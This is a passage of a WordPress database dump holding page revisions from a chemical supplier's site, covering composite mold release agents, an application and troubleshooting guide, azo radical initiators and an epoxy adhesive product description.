include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-24 04:14:26', '2016-11-24 04:14:26', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3124, 3, '2016-11-24 04:18:51', '2016-11-24 04:18:51', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-24 04:18:51', '2016-11-24 04:18:51', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3125, 0, '2016-11-24 16:13:40', '2016-11-24 16:13:40', '', '', '', 'publish', 'closed', 'closed', '', '3125', '', '', '2016-11-24 16:13:40', '2016-11-24 16:13:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3125/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3126, 0, '2016-11-24 17:10:00', '2016-11-24 17:10:00', '', '', '', 'publish', 'closed', 'closed', '', '3126', '', '', '2016-11-24 17:10:01', '2016-11-24 17:10:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3126/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3127, 3, '2016-11-24 20:41:01', '2016-11-24 20:41:01', '<a href="https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/">Vazo FRS</a> (Vazo free radical initiator ) is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as free radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas. Vazo free radical initiators are cost-effective, efficient polymerization initiators and radical halogenation agents.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo FRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds,<a href="https://www.miller-stephenson.com/product/vazo-64-radical-initiator/"> Vazo 64</a> (AIBN) has a 10hr half-life at 64 degrees Celsius, while <a href="https://www.miller-stephenson.com/product/vazo-88-radical-initiator/">Vazo 88</a> has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo free radical initiator variant will work for their synthetic pathway, the number associated each FRS analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS ( Vazo free radical initiator ) is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\r\n\r\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-11-24 20:41:01', '2016-11-24 20:41:01', '', 1601, 'https://www.miller-stephenson.com/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3128, 3, '2016-11-24 20:53:34', '2016-11-24 20:53:34', '<span id="_ctl0__ctl0__ctl0_pageContent_pageContent_pageContent_Description" class="prod-description">MS-907 Two-Part Epoxy Adhesive system kit is a two-part, equal volume, room temperature curing system particularly useful for general purpose bonding. Fast setup time. Perfect for in-plant and field use. Develops bond strength to 3,000 psi. NSN 8040-00-144-9729.</span>\n\nPerfect for in-plant and field use. Develops superior bond strength and provides adhesion to a variety of substrates. Application: Metals, Glass, Ceramics, Plastics, Wood, Rubber, Fabrics, Concrete Base: Epoxy Resin Color: Part A is blue. Part B is beige. When thoroughly mixed, the resultant color is pale gray Container Size: 3.\n\n7 oz. Container Type: Tubes Cure Time: 24 hours at 77 F (25 C), or 2 hours at 140 F (60 C), or one hour at 180 F (82 C) Mixing Ratio: Equal parts by volume Special Features: Good adhesion to a wide variety of surfaces which have not been specially cleaned.\n\nProportioning of Parts A and B not critical. Definite color change during mixing. Temperature Range: Up to 180 F (82 C) Viscosity: Approximately 120, 000 cps, thixotropic Work Life: 20 minutes at 77 F (25 C).', 'MS-907 Two-Part Epoxy Adhesive', 'For bonding metals, glass, ceramics, plastics, wood, rubber, fabrics and concrete.  Miller-Stephenson’s Epoxy 907 Adhesive System is a two-part, equal volume, room temperature curing system particularly useful for general purpose bonding.  Fast set-up time.  Perfect for in-plant and field use.  Develops bond strength up to 3,000 psi.', 'inherit', 'closed', 'closed', '', '1149-autosave-v1', '', '', '2016-11-24 20:53:34', '2016-11-24 20:53:34', '', 1149, 'https://www.miller-stephenson.com/1149-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3130, 0, '2016-11-25 01:02:00', '2016-11-25 01:02:00', '', '', '', 'publish', 'closed', 'closed', '', '3130', '', '', '2016-11-25 01:02:00', '2016-11-25 01:02:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3130/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3131, 0, '2016-11-25 11:57:00', '2016-11-25 11:57:00', '', '', '', 'publish', 'closed', 'closed', '', '3131', '', '', '2016-11-25 11:57:00', '2016-11-25 11:57:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/3131/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3134, 0, '2016-11-25 18:20:05', '2016-11-25 18:20:05', '', '', '', 'publish', 'closed', 'closed', '', '3134', '', '', '2016-11-25 18:20:05', '2016-11-25 18:20:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3134/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3136, 3, '2016-11-25 19:12:03', '2016-11-25 19:12:03', '<h1 data-canvas-width="370.56179999999995"><strong>Mold Release Application Guide -  ReleaSys™ </strong></h1>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive<strong> <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a></strong> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n\r\n<h4><span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span></h4>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n\r\n<h4><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span></h4>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <strong>ReleaSys <a href="https://www.miller-stephenson.com/product/water-based-ptfe-release-agent/">82</a>, <a href="https://www.miller-stephenson.com/product/rubber-mold-release-agents/">85</a>, <a href="https://www.miller-stephenson.com/product/water-based-mold-release-agent/">88</a>, and <a href="https://www.miller-stephenson.com/product/release-agents/">89</a></strong>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and 